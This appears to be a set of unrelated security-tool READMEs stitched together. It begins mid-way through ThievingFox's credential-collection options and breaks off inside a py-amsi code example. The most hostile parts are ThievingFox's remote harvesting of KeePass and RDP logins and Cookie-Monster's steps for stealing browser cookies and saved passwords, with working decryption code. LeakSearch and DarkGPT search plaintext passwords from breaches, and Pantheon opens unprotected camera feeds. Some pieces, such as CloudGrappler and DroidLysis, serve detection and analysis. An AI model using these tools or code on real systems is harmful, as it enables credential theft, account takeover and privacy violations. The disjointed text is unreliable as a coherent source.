--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications
For each application specified on the command line parameters, the collect module retrieves output files stored on the remote host inside C:\Windows\Temp\<tempdir>, corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/output/.
Multiple applications can be specified at once, or the --all flag can be used to collect logs from all applications.
$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications
Information Web Application Security
sudo apt install python3 python3-pip
pip3 install termcolor
pip3 install google
pip3 install optioncomplete
pip3 install bs4
pip3 install prettytable
git clone https://github.com/Matrix07ksa/HackerInfo/
cd HackerInfo
chmod +x HackerInfo
./HackerInfo -h
python3 HackerInfo.py -d www.facebook.com -f pdf
[+] <-- Running Domain_filter_File ....-->
[+] <-- Searching [www.facebook.com] Files [pdf] ....-->
https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_japanese_jp.pdf
#####################[Finshid]########################
sudo python setup.py install
pip3 install hackinfo
Steal browser cookies for Edge, Chrome, and Firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s), and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the Python decryption script can help extract those secrets! The Firefox module will parse profiles.ini, locate where the logins.json and key4.db files are, and download them. A separate GitHub repo is referenced for offline decryption.
Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>]
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-monster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if a chrome process with a handle to the Cookies file is known, specify its PID to duplicate the handle and download the file
--chromeLoginDataPID, if a chrome process with a handle to the Login Data file is known, specify its PID to duplicate the handle and download the file
--edgeCookiePID, if an edge process with a handle to the Cookies file is known, specify its PID to duplicate the handle and download the file
--edgeLoginDataPID, if an edge process with a handle to the Login Data file is known, specify its PID to duplicate the handle and download the file
Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file
Install requirements
pip3 install -r requirements.txt
Base64 encode the webkit masterkey
python3 base64-encode.py "\xec\xfc...."
Decrypt Chrome/Edge Cookies File
python .\decrypt.py "XHh..." --cookies ChromeCookie.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
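For reference, the "v10" value decryption itself is AES-256-GCM with a 12-byte nonce embedded in the blob. A sketch assuming pycryptodome and an already-decrypted master key (this is not the bundled decrypt.py):

```python
# Sketch of Chrome/Edge "v10" cookie decryption with AES-256-GCM, assuming
# you already hold the DPAPI-decrypted WebKit master key (not decrypt.py).
from Crypto.Cipher import AES  # pycryptodome

def decrypt_v10(blob: bytes, master_key: bytes) -> str:
    assert blob[:3] == b'v10'
    # layout: b'v10' | 12-byte nonce | ciphertext | 16-byte GCM tag
    nonce, ciphertext, tag = blob[3:15], blob[15:-16], blob[-16:]
    cipher = AES.new(master_key, AES.MODE_GCM, nonce=nonce)
    return cipher.decrypt_and_verify(ciphertext, tag).decode()
```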
Decrypt Chrome/Edge Passwords File
python .\decrypt.py "XHh..." --passwords ChromePasswords.db
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd
Ensure Mingw-w64 and make are installed on Linux prior to compiling. Run:

make

To compile the exe on Windows:
gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32
This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI
Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments
CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.
To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.
```bash
pip3 install -r requirements.txt
```
To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.
```bash
chmod +x clone.sh
./clone.sh
```
This tool offers a CLI (Command Line Interface). As such, here we review its use:
Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:
Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.
```json
{
  "AWS": [
    {
      "bucket": "cloudtrail-logs-00000000-ffffff",
      "prefix": [
        "testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
        "testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
      ]
    },
    {
      "bucket": "aws-kosova-us-east-1-00000000"
    }
  ],
  "AZURE": [
    {
      "accountname": "logs",
      "container": [
        "cloudgrappler"
      ]
    }
  ]
}
```
Run command
python3 main.py
python3 main.py -p
[+] Running GetFileDownloadUrls.*secrets_ for AWS
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers. This however may be a part of your normal business use case.
python3 main.py -p -jo
```
reports
└── json
    ├── AWS
    │   └── 2024-03-04 01:01 AM
    │       └── cloudtrail-logs-00000000-ffffff--
    │           └── testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
    │               └── GetFileDownloadUrls.*secrets_.json
    └── AZURE
        └── 2024-03-04 01:01 AM
            └── logs
                └── cloudgrappler
                    └── okta_key.json
```
python3 main.py -p -sd 2024-02-15 -ed 2024-02-16
python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'
python3 main.py -f new_file.json
Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.
If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.
The simplest way to authenticate with Azure is to first run:
az login
This will open a browser window and prompt you to login to Azure.
ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.
~ Hilali Abdel
USAGE
python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]
[Add new Device]
python3 smartthings.py -a 192.168.1.1
python3 smartthings.py -s --type TPLINK
python3 smartthings.py -s --firmware TP-Link Archer C7v2
Search for CVEs and PoCs [firmware and device type]
Scan device for open UPnP ports
python3 smartthings.py -s --scan upnp --id
Get data from MQTT 'subscribe'
python3 smartthings.py -s --scan mqtt --id
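Under the hood, such an MQTT check amounts to connecting to the device's broker and subscribing to the wildcard topic. A minimal sketch with paho-mqtt and a hypothetical broker address (not st_tool's internals):

```python
# Minimal MQTT wildcard subscription (paho-mqtt 1.x style API; the broker
# address is hypothetical; this is not st_tool's internal code).
import paho.mqtt.client as mqtt

def on_message(client, userdata, msg):
    print(f'{msg.topic}: {msg.payload!r}')

client = mqtt.Client()
client.on_message = on_message
client.connect('192.168.1.50', 1883, keepalive=60)
client.subscribe('#')  # '#' matches every topic the broker lets us read
client.loop_forever()
```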
DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.
DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.
sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
Install Android disassembly tools
Apktool, Baksmali, and Dex2jar:
$ mkdir -p ~/softs
$ cd ~/softs
$ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
$ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
$ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
$ unzip dex-tools-v2.4.zip
$ rm -f dex-tools-v2.4.zip
Install from Git in a Python virtual environment (python3 -m venv, or pyenv virtual environments etc).
$ python3 -m venv venv
$ source ./venv/bin/activate
(venv) $ pip3 install git+https://github.com/cryptax/droidlysis
Alternatively, you can install DroidLysis directly from PyPI (pip3 install droidlysis).
Edit conf/general.conf. In particular, make sure to change /home/axelle to your appropriate directories.

[tools]
apktool = /home/axelle/softs/apktool_2.9.3.jar
baksmali = /home/axelle/softs/baksmali-2.5.2.jar
dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
keytool = /usr/bin/keytool
...
python3 ./droidlysis3.py --help
The configuration file is ./conf/general.conf (you can switch to another file with the --config option). This is where you configure the location of various external tools (e.g. Apktool), the name of pattern files (by default ./conf/smali.conf, ./conf/wide.conf, ./conf/arm.conf, ./conf/kit.conf) and the name of the database file (only used if you specify --enable-sql).
Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.
DroidLysis uses Python 3. To launch it and get options:
droidlysis --help
For example, test it on Signal's APK:
droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf
DroidLysis outputs:

- A sample analysis directory. With --output /tmp, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290.
- A database (droidlysis.db) containing properties it noticed.

Get usage with droidlysis --help.
The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other types of files (unless there is a bug...) but won't be able to understand the content.
When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput. If you want to store all statistics in a SQL database, use --enable-sql (see here).
DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon.
DroidLysis's analysis does not inspect known 3rd party SDKs by default, i.e. it won't report any suspicious activity from these. If you want them to be inspected, use option --no-kit-exception. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisement) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).
Sample output directory (--output DIR)

This directory contains (when applicable):

- AndroidManifest.xml
- res
- lib, assets
- smali (and others)
- META-INF
- ./unzipped
- classes.dex (and others), converted to jar: classes-dex2jar.jar, and unjarred in ./unjarred

The following files are generated by DroidLysis:

- autoanalysis.md: lists each pattern DroidLysis detected and where.
- report.md: same as what was printed on the console

If you do not need the sample output directory to be generated, use the option --clearoutput.
Import Exodus Privacy trackers (--import-exodus)
)$ python3 ./droidlysis3.py --import-exodus --verbose
Processing file: ./droidurl.pyc ...
DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf
Trackers from Exodus which are not present in your initial kit.conf are appended to ~/.cache/droidlysis/kit.conf. Diff the 2 files and check what trackers you wish to add.
If you want to process a directory of samples, you'll probably like to store the properties DroidLysis found in a database, to easily parse and query the findings. In that case, use the option --enable-sql. This will automatically dump all results in a database named droidlysis.db, in a table named samples. Each entry in the table is relative to a given sample, and each column is a property DroidLysis tracks.
For example, to retrieve the filename, SHA256 sum and smali properties of all samples in the database:
sqlite> select sha256, sanitized_basename, smali_properties from samples;
f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
...
What DroidLysis detects can be configured and extended in the files of the ./conf directory.
A pattern consists of:

- A tag name, e.g. send_sms. This is to name the property. Must be unique across the .conf file.
- A pattern, i.e. a regexp, e.g. ;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage. In the smali.conf file, this regexp is matched against Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.
- A description, e.g. Sending SMS messages.

[send_sms]
pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
description=Sending SMS messages
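Applying such a pattern is, conceptually, a plain regular-expression search over the disassembled Smali (an illustrative sketch, not DroidLysis's code):

```python
# A smali.conf pattern is a regexp matched against disassembled Smali code
# (illustrative sketch, not DroidLysis's code).
import re

pattern = re.compile(
    r';->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage')

smali = ('invoke-virtual {v0, v1, v2, v3, v4, v5}, '
         'Landroid/telephony/SmsManager;->sendTextMessage(...)V')

print('send_sms:', bool(pattern.search(smali)))  # True
```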
Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf. Add option --import-exodus to the droidlysis command line: this will parse existing trackers Exodus Privacy knows which aren't yet in your kit.conf. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf.
Afterwards, you may want to sort your kit.conf file:
import configparser
import collections
import os
config = configparser.ConfigParser({}, collections.OrderedDict)
config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
# Order all sections alphabetically
config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
with open('sorted.conf','w') as f:
config.write(f)
DarkGPT is an artificial intelligence assistant based on GPT-4-200K designed to perform queries on leaked databases. This guide will help you set up and run the project on your local environment.
Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.
First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:
git clone https://github.com/luijait/DarkGPT.git
cd DarkGPT
You will need to set up some environment variables for the script to work correctly. Copy the .env.example file to a new file named .env:

DEHASHED_API_KEY="your_dehashed_api_key_here"
This project requires certain Python packages to run. Install them by running the following command:
pip install -r requirements.txt

4. Then run the project:

python3 main.py
LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.
In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.
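For illustration, querying the ProxyNova COMB API directly looks roughly like this (endpoint and response shape are assumptions based on LeakSearch's behaviour and may change; this is not the tool's code):

```python
# Sketch of a direct ProxyNova COMB query (endpoint and response shape are
# assumptions based on LeakSearch's behaviour; not the tool's code).
import requests

resp = requests.get('https://api.proxynova.com/comb',
                    params={'query': 'example.com', 'start': 0, 'limit': 20},
                    timeout=10)
for line in resp.json().get('lines', []):
    print(line)  # typically "user@domain:password"
```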
It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:
git clone https://github.com/JoelGMSec/LeakSearch
_ _ ____ _
| | ___ __ _| | __/ ___| ___ __ _ _ __ ___| |__
| | / _ \/ _` | |/ /\___ \ / _ \/ _` | '__/ __| '_ \
| |__| __/ (_| | < ___) | __/ (_| | | | (__| | | |
|_____\___|\__,_|_|\_\|____/ \___|\__,_|_| \___|_| |_|
------------------- by @JoelGMSec -------------------
usage: LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]
options:
-h, --help show this help message and exit
-d DATABASE, --database DATABASE
Database used for the search (ProxyNova or LocalDataBase)
-k KEYWORD, --keyword KEYWORD
Keyword (user/domain/pass) to search for leaks in the DB
-n NUMBER, --number NUMBER
Number of results to show (default is 20)
-o OUTPUT, --output OUTPUT
Save the results as json or txt into a file
-p PROXY, --proxy PROXY
Set HTTP/S proxy (like http://localhost:8080)
https://darkbyte.net/buscando-y-filtrando-contrasenas-con-leaksearch
This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.
This tool has been created and designed from scratch by Joel Gรกmez Molina (@JoelGMSec).
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.
Pantheon allows users to execute an API crawler. There was original functionality without the use of any APIs (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.
git clone https://github.com/josh0xA/Pantheon.git
cd Pantheon
pip3 install -r requirements.txt
python3 pantheon.py
chmod +x distros/ubuntu_install.sh
./distros/ubuntu_install.sh
chmod +x distros/debian-kali_install.sh
./distros/debian-kali_install.sh
(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)
(Left-click) on a selected IP:Port to view the geolocation of the camera.
(Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).
Adjust the map as you please to see the markers.
The developer of this program, Josh Schiavone, is not responsible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html
MIT License
Copyright (c) Josh Schiavone
NetworkSherlock is a powerful and flexible port scanning tool designed for network security professionals and penetration testers. With its advanced capabilities, NetworkSherlock can efficiently scan IP ranges, CIDR blocks, and multiple targets. It stands out with its detailed banner grabbing capabilities across various protocols and integration with Shodan, the world's premier service for scanning and analyzing internet-connected devices. This Shodan integration enables NetworkSherlock to provide enhanced scanning capabilities, giving users deeper insights into network vulnerabilities and potential threats. By combining local port scanning with Shodan's extensive database, NetworkSherlock offers a comprehensive tool for identifying and analyzing network security issues.
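At its core, the scan-plus-banner-grab loop looks like this (a bare-bones sketch, not NetworkSherlock's implementation):

```python
# Bare-bones TCP connect scan with banner grabbing, the core idea behind
# NetworkSherlock's -V output (illustrative sketch, not the tool's code).
import socket

def grab_banner(host: str, port: int, timeout: float = 2.0):
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                banner = s.recv(1024)
            except socket.timeout:
                banner = b''
            return banner.decode(errors='replace').strip()
    except OSError:
        return None  # port closed or filtered

for port in (21, 22, 25, 80):
    banner = grab_banner('192.168.1.1', port)
    if banner is not None:
        print(f'{port}/tcp open {banner}')
```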
NetworkSherlock requires Python 3.6 or later.
git clone https://github.com/HalilDeniz/NetworkSherlock.git
pip install -r requirements.txt
Update the `networksherlock.cfg` file with your Shodan API key:
[SHODAN]
api_key = YOUR_SHODAN_API_KEY
python3 networksherlock.py --help
usage: networksherlock.py [-h] [-p PORTS] [-t THREADS] [-P {tcp,udp}] [-V] [-s SAVE_RESULTS] [-c] target
NetworkSherlock: Port Scan Tool
positional arguments:
target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5,
192.168.1.0/24)
options:
-h, --help show this help message and exit
-p PORTS, --ports PORTS
Ports to scan (e.g. 1-1024, 21,22,80, or 80)
-t THREADS, --threads THREADS
Number of threads to use
-P {tcp,udp}, --protocol {tcp,udp}
Protocol to use for scanning
-V, --version-info Used to get version information
-s SAVE_RESULTS, --save-results SAVE_RESULTS
File to save scan results
-c, --ping-check Perform ping check before scanning
--use-shodan Enable Shodan integration for additional information
- `target` : The target IP address(es), IP range, or CIDR block to scan.
- `-p`, `--ports` : Ports to scan (e.g., 1-1000, 22,80,443).
- `-t`, `--threads` : Number of threads to use.
- `-P`, `--protocol` : Protocol to use for scanning (tcp or udp).
- `-V`, `--version-info` : Obtain version information during banner grabbing.
- `-s`, `--save-results` : Save results to the specified file.
- `-c`, `--ping-check` : Perform a ping check before scanning.
- `--use-shodan` : Enable Shodan integration.

Scan a single IP address on default ports:
python networksherlock.py 192.168.1.1
Scan an IP address with a custom range of ports:
python networksherlock.py 192.168.1.1 -p 1-1024
Scan multiple IP addresses on specific ports:
python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443
Scan an entire subnet using CIDR notation:
python networksherlock.py 192.168.1.0/24 -p 80
Perform a scan using multiple threads for faster execution:
python networksherlock.py 192.168.1.1-192.168.1.5 -p 1-1024 -t 20
Scan using a specific protocol (TCP or UDP):
python networksherlock.py 192.168.1.1 -p 53 -P udp
python networksherlock.py 192.168.1.1 --use-shodan
python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443 -V --use-shodan
Perform a detailed scan with banner grabbing and save results to a file:
python networksherlock.py 192.168.1.1 -p 1-1000 -V -s results.txt
Scan an IP range after performing a ping check:
python networksherlock.py 10.0.0.1-10.0.0.255 -c
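The banner grabbing behind `-V` is conceptually simple: connect to the open port and read whatever the service sends first. A minimal standalone Python sketch of the idea (illustrative only, not NetworkSherlock's actual implementation):

```python
# Minimal banner-grab sketch (illustrative; NetworkSherlock adds protocol-specific probes)
import socket

def grab_banner(host: str, port: int, timeout: float = 3.0) -> str:
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            return s.recv(1024).decode(errors="replace").strip()
        except socket.timeout:
            return ""  # services like HTTP wait for the client to speak first

print(grab_banner("192.168.1.1", 22))  # e.g. "SSH-2.0-OpenSSH_8.2p1 ..."
```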
$ python3 networksherlock.py 10.0.2.12 -t 25 -V -p 21-6000
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21-6000
Threads : 25
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
21 /tcp open telnet 220 (vsFTPd 2.3.4)
80 /tcp open http HTTP/1.1 200 OK
139 /tcp open netbios-ssn %SMBr
25 /tcp open smtp 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
23 /tcp open smtp #' #'
445 /tcp open microsoft-ds %SMBr
514 /tcp open shell
512 /tcp open exec Where are you?
1524/tcp open ingreslock root@metasploitable:/#
2121/tcp open iprop 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.2.12]
3306/tcp open mysql >
5900/tcp open unknown RFB 003.003
53 /tcp open domain
---------------------------------------------
$ python3 networksherlock.py 10.0.2.0/24 -t 10 -V -p 21-1000
********************************************
Scanning target: 10.0.2.1
Scanning IP : 10.0.2.1
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
53 /tcp open domain
********************************************
Scanning target: 10.0.2.2
Scanning IP : 10.0.2.2
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
445 /tcp open microsoft-ds
135 /tcp open epmap
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
21 /tcp open ftp 220 (vsFTPd 2.3.4)
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
23 /tcp open telnet #'
80 /tcp open http HTTP/1.1 200 OK
53 /tcp open kpasswd 464/udpcp
445 /tcp open domain %SMBr
3306/tcp open mysql >
********************************************
Scanning target: 10.0.2.20
Scanning IP : 10.0.2.20
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9
Contributions to NetworkSherlock are welcome!
py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to perform antivirus scans in Python. Read more about the Windows AMSI API here.
Via pip
pip install pyamsi
Clone repository
git clone https://github.com/Tomiwa-Ot/py-amsi.git
cd py-amsi/
python setup.py install
from pyamsi import Amsi
# Scan a file
Amsi.scan_file(file_path, debug=True) # debug is optional and False by default
# Scan string
Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default
# Both functions return a dictionary of the format
# {
# 'Sample Size' : 68, // The string/file size in bytes
# 'Risk Level' : 0, // The risk level as suggested by the antivirus
# 'Message' : 'File is clean' // Response message
# }
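As a quick sanity check, you can scan the standard EICAR test string, which any AMSI-registered antivirus should flag. A minimal sketch, assuming a Windows host with an active antivirus:

```python
# Scan the harmless EICAR test string; an active AV should report risk level 32768
from pyamsi import Amsi

EICAR = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

result = Amsi.scan_string(EICAR, "eicar_test")
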